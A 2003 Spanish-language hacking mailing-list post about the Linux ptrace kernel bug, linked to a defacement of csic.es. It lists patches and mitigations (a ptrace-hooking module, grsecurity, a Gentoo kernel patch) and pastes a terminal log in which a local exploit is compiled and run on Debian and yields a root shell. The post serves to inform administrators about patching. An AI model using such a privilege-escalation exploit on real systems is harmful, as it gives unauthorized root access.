[HACK] csic.es defaced y bug ptrace
Victor Roman
daijo at softhome.net
Mon Mar 24 11:59:03 CET 2003
Buenas,
> Una forma facil de parchearse es instalar un modulo que hooke la
> syscall del ptrace que podeis encontrar en www.packetstormsecurity.com
> con el nombre ptracekm.tar.gz, la web dice que es para kernels 2.2 pero
> con un par de cambios funciona perfectamente en los 2.4.
tambien se comento por ahi que los nucleos parcheados con GRSecurity
(http://www.grsecurity.org) no eran vulnerables.
Asimismo, en bugtrack, gentoo puso a disposicion de todo el mundo un
enlace con un parche para el kernel 2.4.20.
Para los que no quieran estar probando el exploit, aqui pongo
informacion de una prueba que realice bajo Debian 3.0 y un kernel
2.2.20:
<-- cortar aqui -->
daijo at guardian:~$ gcc isec-ptrace-kmod-exploit.c -o isec-ptrace-kmod-exploit
daijo at guardian:~$ ./isec-ptrace-kmod-exploit
[+] Attached to 3788
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4000da2d
[+] Now wait for suid shell...
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root)
sh-2.05a# whoami
root
sh-2.05a#
<-- cortar aqui -->
Un saludo a todos los co-listeros
-- Daijo
More information about the hacking
mailing list